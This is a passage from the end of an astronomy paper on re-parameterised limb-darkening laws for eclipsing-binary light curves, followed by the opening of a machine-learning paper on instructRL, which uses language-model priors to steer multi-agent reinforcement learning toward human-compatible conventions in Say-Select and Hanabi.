\(+0.206\) & \(-0.022\) & \(+0.704\) & \(-0.222\) \\ YZ Cas & \(-0.207\) & \(+0.383\) & \(-0.064\) & \(-0.745\) \\ WW Aur & \(-0.363\) & \(+0.374\) & \(-0.711\) & \(-0.688\) \\ \end{tabular} \end{table} Table 3: _Linear Pearson correlation coefficients between \(u^{\prime}\) and \(v^{\prime}\) in our new LD law parameterisations, calculated for each of the five objects included in the numerical experimentation using Monte Carlo simulations._ Several published re-parameterisations of the quadratic LD law [31; 32; 30] were quoted above. We checked these against each of our five objects (allowing for values between \(35^{\circ}\) and \(40^{\circ}\) for the functional form proposed by Pal [30]) and found that they all yielded significantly stronger correlations than the re-parameterisations proposed in the current work. Finally, we did not attempt to compare the coefficients to theory in order to avoid "mission creep". Figure 3: Scatter plots of the LD coefficients for the quadratic and logarithmic laws obtained from fitting the light curve of WW Aur and then performing 1000 Monte Carlo simulations. The correlation coefficient is printed in each panel. _Testing the new LD laws_ Now we had re-parameterisations of the LD laws and implemented them into jktebop, we proceeded to test the code and assess the effect of the revised LD laws. To limit the computational load of this work we analysed only one object, WW Aur, and fitted only the data near eclipse in the first half of the light curve from TESS sector 45. Best fits and 1000 Monte Carlo simulations were performed for the linear LD law, for all two-parameter laws in their original form, for the re-parameterisations presented here, and for the \(h_{1}\) and \(h_{2}\) approach for the power-2 law. Initial or fixed LD coefficients were set to values for the Cousins Figure 4: As Fig. 3 but for the square-root and cubic LD laws. \(R\) passband from Claret & Hauschildt [46], with the exception of the power-2 law for which we used the TESS passband predictions from Claret & Southworth [47]. We also ran two fits using the four-parameter LD law: one with coefficient \(u_{2}\) fitted and one with \(u_{2}\) and \(u_{4}\) fitted. The values of the fixed coefficients were taken from Claret [48]. We report only the most relevant results from this work: the r.m.s. scatter around the best fit, the fractional radii (\(r_{\rm A}\) and \(r_{\rm B}\)), and the orbital inclination (\(i\)). These are given in Table 4 with errorbars assessed using the Monte Carlo simulations. 
The errorbars are not true uncertainties, as Monte Carlo simulations are only one of the tools typically deployed in our error analyses [49], and are almost certainly too small [50]. Extensive comparisons between the results from different LD laws can also be found in the supplementary material to our _Homogeneous Studies_ papers [25, 26, 27, 28] for 94 TEPs. Based on experience, Table 4 and the _Homogeneous Studies_ supplementary material, we draw the following conclusions. First, the linear LD law is too simplistic and gives slightly different results to those from all other LD laws. \begin{table} \begin{tabular}{l c c c c c} _LD approach_ & \(N_{\rm cof}\) & rms (mmag) & \(r_{\rm A}\) & \(r_{\rm B}\) & \(i\) (\({}^{\circ}\)) \\ Linear law & 1 & 0.350 & 0.15958 (4) & 0.15121 (4) & 87.550 (2) \\ Quadratic law & 1 & 0.343 & 0.15973 (4) & 0.15148 (4) & 87.497 (2) \\ Logarithmic law & 1 & 0.352 & 0.15957 (4) & 0.15118 (4) & 87.555 (2) \\ Square-root law & 1 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (2) \\ Cubic law & 1 & 0.341 & 0.15973 (4) & 0.15138 (4) & 87.510 (2) \\ Power-2 law & 1 & 0.341 & 0.15971 (4) & 0.15138 (4) & 87.512 (2) \\ Quadratic re-par & 1 & 0.342 & 0.15972 (4) & 0.15146 (4) & 87.501 (2) \\ Logarithmic re-par & 1 & 0.647 & 0.16019 (7) & 0.15254 (7) & 87.300 (4) \\ Square-root re-par & 1 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (2) \\ Cubic re-par & 1 & 0.348 & 0.15960 (4) & 0.15124 (4) & 87.543 (2) \\ Power-2 (\(h_{1}\) and \(h_{2}\)) & 1 & 0.342 & 0.15970 (4) & 0.15136 (4) & 87.517 (2) \\ Quadratic law & 2 & 0.342 & 0.15969 (4) & 0.15141 (4) & 87.510 (3) \\ Logarithmic law & 2 & 0.341 & 0.15972 (4) & 0.15141 (4) & 87.508 (3) \\ Square-root law & 2 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (3) \\ Cubic law & 2 & 0.341 & 0.15974 (4) & 0.15139 (4) & 87.507 (3) \\ Power-2 law & 2 & 0.341 & 0.15974 (4) & 0.15141 (4) & 87.507 (3) \\ Quadratic re-par & 2 & 0.342 & 0.15969 (4) & 0.15141 (5) & 87.510 (3) \\ Logarithmic re-par & 2 & 0.341 & 0.15972 (4) & 0.15141 (4) & 87.508 (3) \\ Square-root re-par & 2 & 0.341 & 0.15973 (4) & 0.15140 (5) & 87.508 (3) \\ Cubic re-par & 2 & 0.341 & 0.15973 (4) & 0.15140 (4) & 87.508 (3) \\ Power-2 (\(h_{1}\) and \(h_{2}\)) & 2 & 0.341 & 0.15974 (4) & 0.15141 (5) & 87.507 (3) \\ Four-parameter & 1 & 0.341 & 0.15970 (4) & 0.15136 (4) & 87.517 (2) \\ Four-parameter & 2 & 0.341 & 0.15972 (4) & 0.15139 (4) & 87.509 (3) \\ \end{tabular} \end{table} Table 4: _Selected results from fitting the TESS light curve of WW Aur with one or two LD coefficients fitted, for all possible versions of the one- and two-parameter laws. \(N_{\rm cof}\) is the number of LD coefficients fitted. The bracketed quantities indicate uncertainties in the final digit of the preceding values_ It should not be used except for convenience in cases where the data quality is low. Second, the re-parameterised laws give results that are consistent with the original laws. Third, fitting for both LD coefficients yielded comparable results to fitting for one coefficient in the case of WW Aur, for which the data are of extremely high quality. Fourth, the anomalously poor solution in Table 4 for the re-parameterised square-root law suggests that the re-parameterised laws risk giving bad results if only one LD coefficient is fitted and the other coefficient is fixed at a bad value. ### Summary A profusion of LD laws have been proposed, many of which have two coefficients. 
All of these suffer from strong correlations between the two coefficients which hinder the modelling process of observed light curves when both coefficients are fitted parameters. We have proposed a re-parameterisation of the quadratic, logarithmic, square-root and cubic laws and performed numerical simulations to calibrate the re-parameterisations. This was done considering three EBs and two TEPs with a variety of light curve shapes. We give the following recommendations:

1. Light curves of low quality can be modelled using either the linear law for simplicity, or one of the two-parameter laws with one or both coefficients fixed.
2. Light curves of medium quality should be modelled using one of the standard two-parameter laws, with one coefficient fitted and one fixed.
3. Light curves of high quality should be modelled including two LD coefficients as fitted parameters. In this case the re-parameterised laws should be used, to avoid the strong correlations found with the standard two-parameter laws. This is particularly important for sampling algorithms such as Markov chain Monte Carlo (MCMC), to avoid long autocorrelation lengths in the Markov chains.
4. If you are unsure whether a light curve is of low, medium or high quality, you should try two or all three options and decide which is best based on the values of and uncertainties in the fitted LD coefficients (and other system parameters).
5. The linear LD law should be avoided when performing any detailed analysis.
6. The quadratic LD law should be avoided as it does not match theoretical LD predictions well [47, 51].
7. The power-2 LD law should be adopted as the default law because it _does_ match theoretical LD predictions well [35, 47, 52].
8. The four two-coefficient LD laws give highly consistent results when treated in the same way, so the choice between them is not important.
9. The best re-parameterisation of a given LD law varies slightly between light curves. If this is an issue, or if you want to avoid parameter correlations as much as possible, you should use principal component analysis (PCA) to orthogonalise the model parameters in the course of obtaining a least-squares solution to a given light curve.

All LD laws and re-parameterisations have been implemented in version 43 of the jktebop code, which is freely available for download from the author's website. The choice of which LD function to adopt is left to the user.

### Acknowledgements

We thank Drs. Pierre Maxted and Antonio Claret for comments on a draft of this manuscript. This paper includes data collected by the _Kepler_ and TESS missions and obtained from the MAST data archive at the Space Telescope Science Institute (STScI). Funding for the _Kepler_ and TESS missions is provided by NASA's Science Mission Directorate. STScI is operated by the Association of Universities for Research in Astronomy, Inc., under NASA contract NAS 5-26555. The following resources were used in the course of this work: the NASA Astrophysics Data System; the SIMBAD database operated at CDS, Strasbourg, France; and the arXiv scientific paper preprint service operated by Cornell University.
2304.07297
Language Instructed Reinforcement Learning for Human-AI Coordination
One of the fundamental quests of AI is to produce agents that coordinate well with humans. This problem is challenging, especially in domains that lack high quality human behavioral data, because multi-agent reinforcement learning (RL) often converges to different equilibria from the ones that humans prefer. We propose a novel framework, instructRL, that enables humans to specify what kind of strategies they expect from their AI partners through natural language instructions. We use pretrained large language models to generate a prior policy conditioned on the human instruction and use the prior to regularize the RL objective. This leads to the RL agent converging to equilibria that are aligned with human preferences. We show that instructRL converges to human-like policies that satisfy the given instructions in a proof-of-concept environment as well as the challenging Hanabi benchmark. Finally, we show that knowing the language instruction significantly boosts human-AI coordination performance in human evaluations in Hanabi.
Hengyuan Hu, Dorsa Sadigh
2023-04-13T04:47:31Z
http://arxiv.org/abs/2304.07297v2
# Language Instructed Reinforcement Learning for Human-AI Coordination ###### Abstract One of the fundamental quests of AI is to produce agents that coordinate well with humans. This problem is challenging, especially in domains that lack high quality human behavioral data, because multi-agent reinforcement learning (RL) often converges to different equilibria from the ones that humans prefer. We propose a novel framework, _instructRL_, that enables humans to specify what kind of strategies they expect from their AI partners through natural language instructions. We use pretrained large language models to generate a prior policy conditioned on the human instruction and use the prior to regularize the RL objective. This leads to the RL agent converging to equilibria that are aligned with human preferences. We show that instructRL converges to human-like policies that satisfy the given instructions in a proof-of-concept environment as well as the challenging Hanabi benchmark. Finally, we show that knowing the language instruction significantly boosts human-AI coordination performance through human evaluations in Hanabi. Machine Learning, Reinforcement Learning, Human-AI Coordination ## 1 Introduction One of the most fundamental yet challenging goals of AI is to create agents that can coordinate with humans in human-AI hybrid environments. In domains where abundant, high quality human behavioral data is available, such as Diplomacy (FAIR et al., 2022), we can expect AI agents to achieve human level performance and coordinate effectively with humans. However, these methods are limited to settings where high quality human data is readily available. Without access to human data, we have to rely on techniques such as reinforcement learning (RL) algorithms to learn strong policies in multi-agent settings. However, the main challenge in leveraging RL for human-AI coordination is the existence of multiple, mutually incompatible equilibrium policies in a multi-agent system and the fact that without guidance RL agents can converge to any of them (Shih et al., 2021; Hu et al., 2020). Here _equilibrium_ policies refer to optimal or near-optimal joint policies in multi-agent environments. In practice, humans often prefer specific subsets of policies -- particular equilibria in multi-agent games -- that align well with our capabilities and common sense, while reinforcement learning policies that do not integrate any forms of human priors often converge to policies that are hard for humans to collaborate with (Bakhtin et al., 2022; Carroll et al., 2019). Let us consider a simple collaborative game as our running example. Alice and Bob are collaborating with each other on a game "Say-Select" as shown in Figure 1. There are 5 balls in front of Alice and Bob. A random number of them are assigned with +1 reward and the remaining ones are assigned with -1 reward. Alice (left) can see the values of the balls while Bob (right, blind-folded) cannot. They need to collaborate to collect rewards. Alice can refer to any of the balls by communicating a number from 1 to 5 to Bob. Bob can either pick up a ball or quit the game. After collecting the reward associated with the ball, the ball is re-assigned with -1 reward and put back. The game keeps running until Bob quits. It is easy to see that from RL algorithms' perspective, there are numerous equally optimal joint policies that achieves perfect results by learning an arbitrary mapping from Alice's past action sequences to Bob's decision. 
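To make the running example concrete, a minimal sketch of the Say-Select dynamics is given below. It is an illustrative re-implementation of the rules described above (class and variable names are invented for this sketch), not the environment used in the experiments. Any consistent mapping from Alice's utterances to Bob's choices earns the same return, which is precisely the equilibrium-selection ambiguity discussed next.

```python
import random

class SaySelect:
    """Minimal sketch of the Say-Select dynamics (not the authors' environment code).

    Alice sees the ball rewards and says a number 1-5; Bob, who cannot see the
    rewards, either picks up a ball or quits. A picked-up ball yields its reward,
    is put back, and is re-assigned -1. The episode ends when Bob quits.
    """

    def __init__(self, n_balls=5, seed=0):
        self.n_balls = n_balls
        self.rng = random.Random(seed)

    def reset(self):
        # At least one +1 ball is assigned in this illustration; the rest are -1.
        k = self.rng.randint(1, self.n_balls)
        plus = self.rng.sample(range(self.n_balls), k)
        self.rewards = [1 if i in plus else -1 for i in range(self.n_balls)]
        self.done = False
        return list(self.rewards)                  # Alice's observation

    def step(self, bob_action):
        """bob_action: 0 = quit, 1..n_balls = pick up that ball."""
        if bob_action == 0:
            self.done = True
            return 0
        idx = bob_action - 1
        reward = self.rewards[idx]
        self.rewards[idx] = -1                     # the ball goes back with -1
        return reward

# One episode under the intuitive joint policy: Alice points at a +1 ball and
# repeats her last number when none are left; Bob copies Alice and quits on a repeat.
env = SaySelect()
env.reset()
total, last_said = 0, None
while not env.done:
    positives = [i + 1 for i, r in enumerate(env.rewards) if r == 1]
    said = positives[0] if positives else last_said
    bob = 0 if said == last_said else said
    total += env.step(bob)
    last_said = said
print("episode return:", total)
```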
However, it is unclear how existing RL algorithms can reliably produce the policies that are most natural to human. For example, a natural policy is one shown in Figure 1, where when Alice communicates any number \(x\), Bob picks up that ball, and if Alice communicates \(x\) twice in a row, Bob should quit. A popular line of research attempts to address this problem by first producing a diverse set of policies and then train a common best response strategy that may generalize to any humans partner (Cui et al., 2023; Lupu et al., 2021; Charakorn et al., 2022). These methods implicitly require the underlying RL algorithm to generate policies near the equilibria that humans prefer, which by itself is challenging and problem dependent. They also have much higher computational cost in order to produce enough policies to facilitate generalization. best response trained against all possible optimal policies still needs to spend many episodes exploring and identifying its partner's policy when paired with a human. Meanwhile, humans may also adjust their policy in parallel as they try to understand and adapt to the best response, which makes the problem more complicated. Our work seeks to address this challenge based on two key observations. First, humans can better understand and coordinate with a policy if it can concisely be summarized in natural language. Second, in most real world coordination scenarios, humans talk to each other or even negotiate to achieve some agreements on how they should collaborate, i.e., what conventions or equilibrium to follow. For example, in Say-Select, a human can just tell the RL algorithm to produce joint policies _where Bob selects the same number as Alice does_, eliminating coordination overhead when deployed to play with the human. These two important aspects have not been considered in the existing multi-agent reinforcement learning (MARL) methods and we aim to incorporate them for the goal of guiding RL agents towards more human-like policies. In this paper, we propose a novel framework for human-AI coordination where the human can provide high-level natural language instructions to the AI partner as additional specification so that the agent learns to coordinate with the human in ways that match the human's expectation. This would guide the AI agent to follow human's instructions during RL training and agree on a specific equilibrium to converge to. The key idea of our approach _instruct-RL_ is to leverage large language models (LLMs) (Brown et al., 2020) to regularize multi-agent RL training process based on the provided human instructions. We first construct a prior policy by querying large language models (LLMs) given the instructions and short descriptions of the current observation.Then we use the LLM prior to regularize an RL algorithm such as Q-learning (Mnih et al., 2015) or PPO (Schulman et al., 2017) so that the converged equilibrium satisfies the instructions. We initially evaluate our method in the purposely designed Say-Select game discussed above, where we show that our method learns intuitive, human-compatible policies as instructed by the language instructions. Then, we evaluate our method in the large scale Hanabi benchmark (Bard et al., 2020). We show that we can obtain equally strong but qualitatively different policies given different instructions and humans can better coordinate with the AI agents when they know the language instructions that the agents follow. 
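For concreteness, the core mechanism (made precise in Section 4) can be sketched in a few lines of Python: an LLM scores each action description under the instruction and a text description of the current observation, and the resulting log-prior biases both the exploration policy and the bootstrap action of Q-learning. In the sketch below the LLM query is stubbed out with a flat prior, and the table sizes, \(\lambda\), \(\epsilon\), discount and learning rate are placeholder values rather than the settings used in the experiments.

```python
import numpy as np

rng = np.random.default_rng(0)
n_states, n_actions = 36, 6          # e.g. Bob in Say-Select: quit or pick ball 1-5
Q = np.zeros((n_states, n_actions))
lam, eps, gamma, alpha = 0.25, 0.1, 0.99, 0.1

def llm_log_prior(state):
    """Stub for log p_LLM(a | inst, lang(obs)).

    In instructRL each action description is scored by an LLM under the
    instruction; a flat prior keeps this sketch self-contained and runnable.
    """
    return np.full(n_actions, -np.log(n_actions))

def act(state):
    """Epsilon-greedy over the regularized scores Q + lambda * log p_LLM."""
    if rng.random() < eps:
        return int(rng.integers(n_actions))
    return int(np.argmax(Q[state] + lam * llm_log_prior(state)))

def q_update(state, action, reward, next_state, done):
    """Q-learning backup whose bootstrap action also respects the LLM prior."""
    a_next = int(np.argmax(Q[next_state] + lam * llm_log_prior(next_state)))
    target = reward + (0.0 if done else gamma * Q[next_state, a_next])
    Q[state, action] += alpha * (target - Q[state, action])

q_update(state=0, action=act(0), reward=1.0, next_state=1, done=False)
```

The instructPPO variant described in Section 4 instead adds a KL penalty toward the same prior to the PPO objective.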
## 2 Related Work **Language and Human Inductive Bias:** Our research is closely related to the works that study the role of natural language in learning. On the relationship between natural language and the inductive bias of human learning, Kumar et al. (2022) show that training RL agents with the auxiliary tasks of predicting representations from human-generated natural language task descriptions leads to more human-like behavior. Their conclusion aligns well with our motivation that human's inductive bias makes us prefer policies that can be easily described in language. **Language for Exploration in RL:** Natural language has also been used to improve RL in various ways. The most relevant ones use language abstraction for exploration. Mirchandani et al. (2021) rewards the agent for finishing any semantically meaningful low-level such as 'picking up a key' and gradually build up a dataset for learning to correlate the high-level instructions with low-level descriptions. Tam et al. (2022) and Mu et al. (2022) use language or visual language models to discover novel states for intrinsic rewards at the semantic level. These works focus on learning a better policy in single agent RL setting by addressing the hard exploration problem. In comparison, our work focuses on the _equilibrium selection_ problem -- converging to a human-like equilibrium -- in multi-agent systems. These two problems are orthogonal. Even in environments where exploration is not an issue, such as our Say-Select example, we still need novel methods to obtain a human-like policy. **Foundation Models and In-Context Learning for RL:** Prior works have explored using foundation models for reward specifications in RL (Kwon and Sadigh, 2023; Fan et al., 2022). The in-context learning capability of the large foundation models (Brown et al., 2020; Bommasani et al., 2021) allows user to specify reward function with natural language descriptions. MineDojo (Fan et al., 2022) collects a large Figure 1: Illustration of one episode of the toy example. **Left**: At the beginning of the episode, two random balls are assigned with +1 while the others are assigned with -1. Alice says ‘1’ to Bob. Bob picks up ball #1 and the team gets +1 reward. **Middle**: The ball is put back to the table but now assigned with -1. Alice says ‘5’ to Bob and Bob picks up ball #5. **Right**: Now that all the balls have -1 reward. Alice says ‘5’ again to Bob. Bob realizes there must be no positive reward balls left, so he quits. scale multi-modal Minecraft dataset from the internet and trains a CLIP (Radford et al., 2021) style contrastive video-text model. It then uses the video-text model to provide dense reward for RL by computing the similarity between the embedding of in-game video clip and the embedding of the language description of the task. Apart from our focusing on the _equilibrium selection_ problem mentioned above, our method is also different in that it does not rely on purposely collected domain specific data but use an off-the-shelf large language models (LLMs) like GPT-3 together with the reward from the environment. Kwon and Sadigh (2023) utilize the in-context learning capability of LLM to design hard-to-specify reward functions for RL, such as versatility, fairness etc. Because the rewards from LLM is the only learning signal, their method can only be applied to small settings with few timesteps because LLMs need to understand the entire game logic and past history to make decision. 
In contrast, our work focuses on the settings where environment reward is crucial for learning optimal policies and LLMs help to steer the learning process to produce a policy that satisfy the language instruction. Thanks to this hybrid setup, we can apply it to more complex environments like Hanabi. **Human-AI Coordination:** There are three related research directions in human-AI coordination problems. The first one is to use human data to directly model human behavior (Carroll et al., 2019) or to regularize RL/search so that it learns expert level policies while staying close to human equilibria (Lerer and Peysakhovich, 2018; FAIR et al., 2022). The second direction is to design cognitively inspired learning algorithms (Laidlaw and Dragan, 2022; Hu et al., 2021; Cui et al., 2021) to produce more human-like policy than vanilla RL does. The final one seeks to produce a diverse set of policies (Lupu et al., 2021; Cui et al., 2023; Charakorn et al., 2022; Strouse et al., 2022) and train a common best response to them so that it may generalize better to unseen partners. Our work does not require human dataset but instead uses human specified language instructions and LLMs to train RL policies that matches human's preference for better coordination. It can be combined with methods from the second category to train more human-like policies that satisfies the instruction. As we show later in the experiment section, our method can also produce semantically different policies given different instructions, making it a compelling method for the third paradigm. ## 3 Background **MARL:** Multi-agent RL (MARL) is a powerful tool for learning strong agents in multi-agent environments. The environment consists of the state space \(\mathcal{S}\), \(N\) agents with their respective action space \(\mathbf{\mathcal{A}}=\mathcal{A}^{1}\times\cdots\times\mathcal{A}^{N}\). A transition function \(\mathcal{T}:\mathcal{S}\times\mathbf{\mathcal{A}}\rightarrow\mathcal{S}\) defines the dynamics of the environment. We consider the fully cooperative setting where a reward function \(r:\mathcal{S}\times\mathbf{\mathcal{A}}\rightarrow\mathbb{R}\) returns a _common payoff_ shared by all players given state \(s\) and joint action \(\mathbf{a}\). We focus on the partially observable setting where each agent has their own observation function \(\Omega:\mathcal{S}\rightarrow\mathcal{O}\). Although the coordination challenge exists in fully observable settings, it is more prominent under partial observability because the inference of other agents' true intention is much harder. The policy for each player \(\pi^{i}(a_{t}^{i}|\tau_{t}^{i})\) takes in an _action-observation history_\(\tau_{t}^{i}=\{\Omega^{i}(s_{1}),a_{1},...,a_{t-1},\Omega^{i}(s_{t})\}\) and outputs a distribution over its action space \(\mathcal{A}^{i}\). A joint policy is simply the collection of policies for all players \(\mathbf{\pi}=(\pi^{1},\dots,\pi^{N})\). The goal of MARL is to train a joint policy that achieves the maximum total return \(J(\mathbf{\pi})=\mathbb{E}_{\tau\sim\pi}R(\tau)\) where \(R(\tau)=\sum_{t=t_{0}}^{T}\gamma^{t}\cdot r_{t}\) is the total discounted return of a game. \(\gamma\) is the discounting factor. **LLMs:** Large language models (LLMs) (Brown et al., 2020) are generative text models trained on enormous datasets collected from Internet to predict next token given the context. 
With proper prompts (Wei et al., 2022; Kojima et al., 2022), LLMs have demonstrated impressive zero-shot or few-shot generalization capabilities on challenging tasks such as reasoning and arithmetic. Researchers have further fine-tuned LLMs using RL with human feedbacks (RLHF) (Ouyang et al., 2022) or instructions (Chung et al., 2022) to generate more consistent, higher quality results. ## 4 Method In this section, we introduce _instructRL_, a language augmented RL method that can converge to different equilibria given a language instruction. Specifically, we are interested in operationalizing instructRL in multi-agent settings for collaborating with humans. In such settings, the human partner can provide a language instruction guiding the joint equilibrium of the human-AI team. The core idea of instructRL is to first construct a prior policy using LLMs that is conditioned on two pieces of information: 1) the initial human instruction and 2) a language prompt that describes relevant observations based on rolling out the current policy in the environment. For instance, for our Say-Select example in Figure 1, we can give instruction _"Select the same number as Alice"_ to the Bob agent and the description of the current observations can be _"Alice said 1."_ We then train an RL agent, where its objective is regularized with the generated LLM prior as a reference policy. **LLM Prior Policy:** We construct the prior policy by letting an LLM to predict the probability of possible actions given the observation and the instruction. To do so, we essentially need to evaluate \(p_{\texttt{LLM}}[\texttt{lang}(a_{t})|\texttt{lang}(\tau_{t}^{i}),\texttt{ inst}]\) for all possible action at each time step, which requires language descriptions of observations \(\texttt{lang}(\tau_{t}^{i})\) and actions \(\texttt{lang}(a)\). We note that the language instruction inst_stays fixed_ during training, i.e., no active human feedbacks during the actual RL loop. The LLM observes the game through the language descriptions of the observations. In board game environments such as Hanabi and Diplomacy, the language description of current observation \(\tau_{t}^{i}\) can be generated automatically with simple rule-based programs. In fact, the language observations are often the most natural medium on which humans reason about these games. However, in real world scenarios that require grounding in the physical environment, we may use image captioning models (Radford et al., 2021) to generate descriptive languages of the scenes or extend our framework to allow humans to specify instructions in video format. We leave this for future explorations. In order for the LLM to evaluate whether an action is plausible given the instruction inst and the current observation \(\texttt{lang}(\tau_{t}^{i})\), we must also map each action to a language description (\(\texttt{lang}(a)\)). It is easy to convert actions to language descriptions in the games we consider in this paper. Prior works have also assigned language descriptions to high level robotics primitives so that they can use LLMs for task level planning in real world (Ahn et al., 2022; Huang et al., 2022). However, it is worth noting that many environments contain actions that cannot be easily abstracted in language, e.g., in a robotics setting, where the actions are the continuous joint angles of a robot arm. 
We note that this is a limitation of our work, but we are hopeful that with the active development of new multi-modal foundation models, the ideas of this work can be applied more broadly beyond LLMs -- enabling humans to effectively guide AI agents to reach more desirable equilibria. Having defined inst, \(\texttt{lang}(\tau_{t}^{i})\) and \(\texttt{lang}(a_{t})\), we can compute \(p_{\texttt{LLM}}=\textsc{Softmax}(\beta\cdot\texttt{logit})\) where \(\beta\) is an optional scaling factor and the logit is a function of the language components, i.e. \(\texttt{logit}=f(\texttt{inst},\texttt{lang}(\tau_{t}^{i}),\texttt{lang}(a_{ t}))\). For actions that have homogeneous descriptions, such as in Say-Select, the logit function \(f\) can simply be the prediction loss of the \(\texttt{lang}(a_{t})\) conditioned on some prompt that combines inst and \(\texttt{lang}(\tau_{t}^{i})\). Another option, which is later used in the Hanabi experiments, is to construct a question-answering style prompt that ask whether we should do \(\texttt{lang}(a_{t})\) given the instruction inst and current observation \(\texttt{lang}(\tau_{t}^{i})\). We set the logit to 1 if the probability of generating affirmative answers is greater than the probability of generating negative answers, and 0 otherwise. The LLM prior \(p_{\texttt{LLM}}\) itself is not sufficient to solve complex tasks. For example, a moderate-sized LM with roughly 6B parameters can not figure out when to quit in Say-Selectin Figure 1 and even the largest LM to date cannot play Hanabi in human level. Therefore, we still need to rely on RL to find good policies, but we guide the RL policy using the LLM prior described in this section as a regularizer to satisfy the language instructions provided by the human. **Regularized RL:** Regularization has been widely used in RL to encourage exploration (Mnih et al., 2016), or to encourage an RL policy to stay close to a given prior (Ziebart et al., 2008). Notably, regularizing RL policies towards a behavioral cloned policy trained on a massive human dataset was critical for mastering complex games such as Starcraft (Vinyals et al., 2019) and Diplomacy (Bakhtin et al., 2022). In this paper, we would like to similarly regularize an RL agent to guide the equilibria towards desirable behaviors. Instead of relying on massive amount of human data or hand-designed reward shaping, we enable the user to regularize the RL policy by providing language instructions. The LLM prior \(p_{\texttt{LLM}}\) effectively captures the human preferences, which allows us to instruct an RL agent towards human preferences. We thus refer to our algorithm as instructRL. We consider two types of regularization techniques for Q-learning and PPO respectively. For Q-learning (Mnih et al., 2015), we can simply augment the policy with \(\log p_{\texttt{LLM}}\). The exploration policy becomes \(a=\epsilon-\textsc{Greedy}(Q_{\theta}+\lambda\log p_{\texttt{LLM}})\) and the training becomes \[Q_{\theta}(\tau_{t}^{i},a_{t})\gets r_{t}+\gamma Q_{\theta}(\tau_{t+1}^{i },a_{t+1}^{\prime}),\] where \(a_{t+1}^{\prime}=\underset{a}{\operatorname{argmax}}[Q(\tau_{t+1}^{i},a)+ \lambda\log p_{\texttt{LLM}}(\tau_{t+1}^{i},a)]\). We refer to this version of instructRL as _instructQ_. For PPO (Schulman et al., 2017; 2017), we add a KL penalty term to the objective \(J(\theta)=\mathbb{E}_{\tau\sim\mathbf{\pi_{\theta}}}R(\tau)+\lambda\text{KL}(\pi_{ \theta}||p_{\texttt{LLM}})\). 
The policy loss becomes \[\mathbb{E}_{\tau\sim\mathbf{\pi_{\theta}}}\sum_{t}[-\log\pi_{\theta}(a_{t}|\tau_{t} ^{i})A_{t}+\lambda\text{KL}[\pi_{\theta}(\tau_{t}^{i})||p_{\texttt{LLM}}(\tau_ {t}^{i})]]\] where \(A_{t}=Q(\tau_{t}^{i},a_{t})-V(\tau_{t}^{i})\) is the advantage. The value loss remains unchanged. We refer to this as _instructPPO_. We summarize our method in Algorithm 1 and provide an illustration of the instructQ version in Figure 2. In addition, Figure 2: InstructQ. The differences between instructQ and normal Q-learning is highlighted in blue. we note that other regularization techniques, such as soft Q-learning (Haarnoja et al., 2017) or modifying the reward function to be \(r-\lambda\log\frac{\pi_{\theta}(a_{i}|\tau_{t}^{i})}{p_{\texttt{init}}(a_{t}|\tau_ {t}^{i})}\)(Ziegler et al., 2019), also fit into our instructRL framework. ## 5 Experiment In this section, we will demonstrate instructRL in two multi-agent coordination game settings: Say-Select in Sec. 5.1 and Hanabi in Sec. 5.2. We will open-source code and models for both experiments. ### Say-Select Experiment We first evaluate our method on Say-Select game shown in Figure 1. In this game, as discussed earlier, an intuitive solution for Bob is to pick up the ball \(\#k\) if Alice says \(k\) and for Bob to quit if Alice says a number that has appeared before. This is because if Alice repeats a number, the corresponding ball will have a negative reward, and thus any reasonable partner would not repeat a number twice if there are other playable balls with positive reward. The observation of Alice is a tuple containing the reward of every ball and the previous action of Bob. Alice's action space is saying a number from 1 to 5 referring to any of the 5 balls. It is sufficient to let Bob's observation to be the last two actions of Alice, as that would be enough for Bob to optimally respond to Alice, e.g., converge to the policy described earlier. In this game, we use instructQ for Bob, while allowing Alice to use vanilla Q-learning. We set the instruction for Bob inst = "I should select the same number as my partner". We map Bob's observation to text lang(\(\tau_{t}^{i}\)) by converting Alice's _most recent_ action (1 through 5) from integer to string. Note that the RL policy still observes the last two actions. For Bob's actions, we map them to string {"0", "1",..., "5"} with 0 for quitting and the remaining 1 through 5 for selecting the corresponding ball. We combine all these components to create the following prompt: "{inst}. _My partner selected lang(\(\tau_{t}^{i}\))._ _So I should select"_ We feed the prompt to an open-sourced GPT-J (Wang and Komatsuzaki, 2021) model with 6 billion parameters and use the prediction loss for the action strings as logits (Ahn et al., 2022). Finally, we apply Softmax to the logits with \(\beta=1\) to get the prior policy \(p_{\texttt{LLM}}\). We use tabular Q-learning with no neural network as the state space is small enough and regularization weight \(\lambda=0.25\) for instructQ. Details on the hyper-parameters are in Appendix A.1. **Result:** With instructQ, Alice and Bob always (10 out of 10 seeds) converge to the intuitive joint policy. In the converged joint policy, Alice says a number that corresponds to a \(+1\) reward ball if there any balls with positive reward are still left and repeats her most recent action otherwise, i.e., if there no \(+1\) reward balls are left. Bob quits if the last two actions from Alice are the same. 
Otherwise, he selects the ball with the same number as Alice says. Bob's policy is illustrated in the right plot of Figure 3. On the left and middle shows two policies from normal Q-learning, i.e., same hyper-parameters except for \(\lambda=0\). Although all Figure 3: Bob’s policy trained with different methods. Row values are Alice’s actions _two steps ago_ and column values are Alice’s actions _one step ago_. The value in each cell is Bob’s action when observing Alice’s past two actions. Here Bob’s actions are 1 through 5 (shown in different shades of blue) for selecting different balls and “Q” (shown in yellow) refers to Bob quitting. **Left** and **Middle**: Two policies from vanilla Q-learning but with different seeds. **Right**: Policy from instructQ with \(\lambda=0.25\). We note that all three policies shown here are optimal in self-play, but only the InstructQ policy is the intuitive policy that follows inst=“I should select the same number as my partner”. three policies are _optimal_ in self-play, the instructQ policy is clearly easier for human to coordinate with. The language instruction associated with the instructQ policy makes it effortless to understand Alice's intents even without any explicit communication. ### Hanabi Experiment Hanabi is a fully cooperative card game that is often used as a benchmarking environment for MARL and human-AI coordination (Bard et al., 2020). It requires implicit communication through actions and reasoning about other people's intentions. In this section, we first introduce the rules of Hanabi, followed by two different strategies that are commonly used by humans. Then we show that both instructQ and instructPPO can produce these two strategies given their corresponding language instructions. Finally, through human evaluation, we show that humans and AI can coordinate much more effectively when they know the instructions used in training of the RL agents. They also think that the agents' policies satisfy the language instructions and the language helps them better coordinate with the agents. **Hanabi rules and strategies:** We consider the 2-player version of Hanabi in this paper. The deck in Hanabi consists of 5 color suits. Each suit has 10 cards divided into 5 ranks with three 1s, two 2s, two 3s, two 4s and one 5. The players need to collaborate to play exactly 5 cards of each color in increasing order of rank. For example, when no cards have been played, the 1s of all colors are valid play. If a red 1 has been played, then the 